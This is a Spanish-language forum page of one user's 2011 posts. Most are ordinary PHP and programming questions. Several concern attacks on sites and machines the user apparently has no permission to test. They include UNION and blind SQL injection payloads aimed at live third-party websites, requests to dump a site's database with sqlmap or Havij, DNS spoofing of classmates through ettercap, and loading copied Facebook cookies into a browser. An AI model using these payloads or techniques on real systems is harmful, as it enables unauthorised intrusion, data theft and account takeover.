| |
 Mostrar Temas
|
|
Páginas: 1 2 3 [4] 5
|
|
31
|
Seguridad Informática / Nivel Web / Inyeccion SQL con cookies
|
en: 28 Noviembre 2011, 16:24 pm
|
|
Buenas a todos!
Hoy he estado intentando buscar errores en una web y al final encontré lo que buscaba. pero, el problema es, que se trata de una inyección sql pero tienes que estar logueado para poder hacerla.
Intentando con havij y con SQLiHelper, me di cuenta, por que al poner la web me redireccionaba y yo me quedaba... "Hola", al final pensé y copie la url la abrí con otro explorador y ya afirmé lo que estaba pensando.
Bueno como la BD tiene 138 tablas me da un poco de palo hacerlo manualmente y así de paso os pregunto si conocéis alguna manera de con SQLmap, SQLiHelper o Havij de hacer esa petición estando logueado con ellos.
Había pensado de montar un pequeño proxy logueado y hacer por hay la petición, pero , no tengo mucha idea de proxys y supongo que habrá una manera de hacerlo más fácil.
Bueno un saludo a todos y gracias.
|
|
|
|
|
32
|
Programación / PHP / Ejecutar un php y seguir navegando.
|
en: 14 Noviembre 2011, 02:15 am
|
|
Buenas a todos!!
Llevo varios días en un pequeño proyecto y, poco a poco, va tomando forma.
Ahora mismo estoy buscando una manera de ejecutar un codigo php y de mientras seguir navegando por la web, me refiero a que, al enviar un post, el browser se queda pensando hasta que el servidor realiza la acción, pero a mí me interesa que al enviar el post se pueda seguir navegando.
Si no me habéis entendido, imaginar un php que tiene que copiar y calcular 40000 operaciones, nosotros damos click al form, empieza eso, y ha esperar...
Se me habían ocurrido unas cuantas maneras, pero no me funcionan.
Una era, ponerle un header("Location: blahblahblabh"); pero no redirecciona hasta que termina.
Otra era, en el form, dirigirme a un php con un header("Location: blablalblalbalabl"); y que a su vez ejecutara el otro php... Pero nada.
Así, que lo único que me queda es esperar a que me digáis la palabra AJAX que supongo que será de ese modo. XD
Bueno al fin y al cabo, quiero realizar una página, que mientras este el codigo php en ejecución muestre algo típico como: Cargando, Nº de petición $num, Tiempo restante aprox: $tm.
Un saludo a tod@s!!
|
|
|
|
|
33
|
Programación / PHP / Ayuda con preg_match()
|
en: 6 Noviembre 2011, 16:15 pm
|
Buenas gente! Necesito una pequeña ayuda con preg_macth a la hora de hacer un array con valores obtenido mediante get. Los valores los obtengo de la siguiente forma. {"t":"Nombre1","i":987654321,"u":"http:\/\/www.url.com","n":"","it":null},{"t":"Nombre2","i":123456789123,"u":"http:\/\/www.url.com","n":"","it":null} Yo lo que quiero obtener es el valor "i":89372587823,Algo como esto. {"t":"Nombre1","i": 987654321,"u":"http:\/\/www.url.com","n":"","it":null},{"t":"Nombre2","i": 123456789123,"u":"http:\/\/www.url.com","n":"","it":null} Y luego meterlo en el array listid... De momento estoy intentando con esto: preg_match("/\"i\":(.*?)/", $page, $listid);Pero nada de nada, la variable page es donde esta la info que la devuelve correctamente por que con un echo $page se ve perfectamente todo el codigo. Asi que no se... haber si alguien me puede echar una mano que es que no se como pasar eso a un array. Muchas gracias a todos y hasta luego !!  |
|
|
|
|
34
|
Seguridad Informática / Hacking / DNS spoof a Maquina virtual en NAT
|
en: 28 Octubre 2011, 18:47 pm
|
|
Bueno hoy por la tarde he estado jugando un poco con maquinas virtuales mas concretamente con un BT5 y un XP.
Mientras estaba en clase he estado intentando hacer un DNS spoof a las maquinas virtuales, cosa que, si estaban en Modo puente no había problema por que da una ip de red común.
El problema viene que por defecto todas las maquinas virtuales vienen con NAT y entonces para hacer un DNS spoof se tiene que hacer también a la máquina anfitriona.
Por mi parte el backtrack lo puedo poner en modo puente claro esta ya que lo ejecuto desde mi maquina virtual y lo configuro... lo que no puedo hacer es decirle a los compañeros es "ejecuta tu windows en modo puente no?¿?¿" XDDD
El tema es que, si mediante filtros del ettercap, se puede llegar a hacer un spoof a la maquina virtual pasando por la anfitriona pero sin que esta sea redireccionada.
He estado mirando como van los packetes en wireshark i en el header del proto ethernet como me esperaba efectivamente sale la mac de la maquina virtual, así que si alguien sabe mucho de filtros con ettercap no creo que le sea dificil crear un filtro que en el caso de que los packetes del puerto 80 si tienen en el header del protocolo ethernet algo como 08:00:C0 o Cadmus redireccione el destino a una ip deseada.
Otra cosa que no he dicho, seria por ejemplo que los que usan internet explorer sean redireccionados y los de mozilla no, que puede ser sea mas sencillo que no el de arriba.
Bueno me despido y gracias a todos!
Un saludo Xsty!
|
|
|
|
|
35
|
Programación / Desarrollo Web / Cookies Y Facebook
|
en: 20 Octubre 2011, 23:27 pm
|
|
Buenas a todas!
Esta tadre he estado intentando agregar una cookie ha mozilla desde codigo php y javascript.
Lo que ha pasado es que al intentar poner el host ".facebook" no me creaba las cookies :S no se si esto sera por seguridad, o que el dominio que crea la cookie tiene que ser el mismo ... pero enfin.
Por la parte de javascript probe con "document.cookie" y por la parte de php con setcookie() al crear una cookie solo con un name y value si me las crea pero cuando voy a ponerle de host facebook o lo que sea nada.
La cosa es, que por comodidad y no tener que editar las cookies con un addon una por una, se me ocurrió crear un formulario donde hacer un copy paste de los valores de las cookies, mandarlas a un php o javascript que me las guarde en el explorador, y redireccionarme a facebook con las cookies ya puestas.
Si por php o javascript no se puede hacer eso por seguridad de los exploradores, habia pensado también la opción de hacerlo editando directamente el archivo donde el explorador guarda las cookies, pero creo que firefox las guarda en una base de datos sqlite y no tengo ni p**a idea !!! XD pero seguro que de esa manera es 100% posible añadirlas.
Bueno gente muchas gracias y hasta luego.
|
|
|
|
|
36
|
Programación / PHP / Php, Curl y Facebook
|
en: 2 Octubre 2011, 04:09 am
|
|
Buenas a todos!!!
Bueno, hoy estaba un poco aburrido así que sin saber casi php he conseguido crear un pequeño script.
El script lo he ido sacando parte por parte de otros códigos ya que no tengo mucha idea de programar. Lo que hace de momento es con el user y pass de una cuenta de facebook logea automaticamente y coge los token.
De momento no es gran cosa la que hace pero por algo se empieza. El plan es que eso logee con una cuenta y realice una acción deseada, por ejemplo, publicar en el muro. Por ahora no e llegado a esa segunda parte ya que estoy reventado y me voy a ir a dormir en nada.
Algunos ya cogeréis por donde van los tiros, otros dirán que lamer etc... pero bueno en fin simplemente lo hago para aprender ^^
Abro este post por que durante el tiempo que este practicando esto se que me surgiran dudas y alomejor alguien interesado lee esto hoy y va cada día mirando y echando un cable.
Mi pregunta, que casi la puedo afirmar pero no estoy seguro es la siguiente.
Verdad que facebook cambia los tokens cada hora????
Bueno un placer gente y haber si os animáis, de momento no hay mucho de que hablar pero mañana cuando me ponga seguro que tendre muchas preguntas que no me las responde google xDDD.
PD: Hoy iva a postear pero leyendo leyendo, de por aquí, de por allá, he conseguido lo que quería por el momento. Ah y perdonar si hay alguna falta es que ya ni puedo corregir con el corrector de lo sobado que estoy!!!!
|
|
|
|
|
37
|
Foros Generales / Dudas Generales / C++ o C#
|
en: 10 Agosto 2011, 07:29 am
|
|
Bueno al fin me he decidido empezar a programar y la cosa es que tengo dos libros, uno de C++ y otro de C# y no tengo ni idea de por cual me conviene empezar...
Me he leído el principio de los 2 libros y claro cada uno defiende su lenguaje... así que si me echáis un cable os lo agradecería.
Por cierto quiero basar mi programación ante todo en videojuegos antes que en aplicaciones moviles y de PC.
Leí algo sobre C# y XNA pero no me queda claro... Me parece que es solo para Windows y Xbox pero por algo se tiene que empezar ^^
Un saludo a Todos y Gracias !!
|
|
|
|
|
38
|
Seguridad Informática / Nivel Web / Blind Sql ayuda :)
|
en: 30 Junio 2011, 18:48 pm
|
Buenas a todos. He estado probando en red local un poco de Blind sql para enterarme bien de lo que era y tal pero me gustaría saber que debe de existir ya algun brute force de blind sql o si no información para crear un script en perl python ... Lo que me gustaría crear es algo que buscase las tablas desde una lista creada para no tener que estar poniendo todo el rato una por una... Y bueno normalmente las inyecciones Blind sql por lo que veo son asi: blindvuln.php?id=1 and 1=1 no sale error
blindvuln.php?id=1 and 1=2 sale errorPero me e encontrado otros casos en los que necesitas poner comillas simples por que supongo que el query lo harán con la variable entre comillas así '$variable'. Entonces lo que hago es lo siguiente: blindvuln.php?id=1' and 1='1 no sale error
blindvuln.php?id=1' and 1='2 sale errorAsí funciona y la mayoría de scripts creados ya para buscar tablas deben de usarlo sin las comillas y por eso no me funcionan :S La cuestión es que quiero crear algo que me haga esto: blindvuln.php?id=1' and (SELECT Count(*) FROM NOMBRE_TABLA ) >='1 Donde NOMBRE_TABLA es la variable que usaría el programa para ir probando las tablas de un archivo, lista o lo que sea... No estoy pidiendo que me hagáis el script simplemente info sobre algún programa existente o algún script que pudiera modificar para añadirles las comillas simples. Gracias a todos |
|
|
|
|
39
|
Seguridad Informática / Nivel Web / Ayuda en una inyeccion sql
|
en: 25 Junio 2011, 13:12 pm
|
Buenas a todos. El otro dia me dio por hacer una inyeccion a una web sin fines satanicos solo para pobrar si era vulnerable y lo era.. pero me pasan varias cosas y tengo las dudas 1.- Empiezo con order: vuln.php?id=69+order+by+10 no error .... 15 error .... 12 error ..... 11 no error vale es 11.... 2.- vuln.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11--el servidor me tira ... Bad request ?¿? 3.- Añado "all" entre union y select y .... Hola me suelta las columnas vulnerables vuln.php?id=-1+union+all+select+1,2,3,4,5,6,7,8,9,10,11--4.- Miro la version de mysql: vuln.php?id=-1+union+all+select+1,@@version,2,3,4,5,6,7,8,9,10,11-- es 4.1.22 5.- Vamos ^^ vuln.php?id=-1+union+all+select+1,table_name,3,4,5,6,7,8,9,10,11+from+information_schema.tables--y en vez de salirme nada me sale un error otra vez ... dos en concreto Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /var/www/vhost/xxxxxxxx/home/html/vuln.php on line 40Warning: mysql_free_result(): supplied argument is not a valid MySQL result resource in /var/www/vhost/xxxxxxxxx/home/html/vuln.php on line 105He estado mirando y creo que puede ser que sea por que es MySql 4 pero bueno Un saludo a todos y gracias |
|
|
|
|
40
|
Programación / Desarrollo Web / Submit desde URL
|
en: 4 Junio 2011, 06:17 am
|
Hola !!! Llevo ya toda la noche rompiendome la cabeza, y al final no se que hacer.... Bueno explico: Tengo una url tipo: www.web.com/añadir.php?id=1111111111Al ir a esa url te pide que confirmes dandole a un boton... Cuando confirmas te devuelve a la pagina anterior y añade a la lista. Lo que quisiera saber es como modificando la url, automaticamente haga el submit, el motivo es por que quiero crear un link, que al hacer click, automaticamente se agregue sin tener que pasar por el boton algo tipo: www.web.com/añadir.php?id=11111111111&submitLa verdad es que tiene que ser sencillo pero no se... No quiero que me deis respuestas directas, sino cosas para leerme y entender como hacerlo, por que si no luego no aprendo xDDD. Ahora montare un server Local y creare algo de ese tipo para ver si consigo destartalar todo esto. PD: tiene que ser desde la URL supongo que con la solucion tendra algo de java pero es que ni idea. Gracias y nos vemos  |
|
|
|
|
|
| |
|
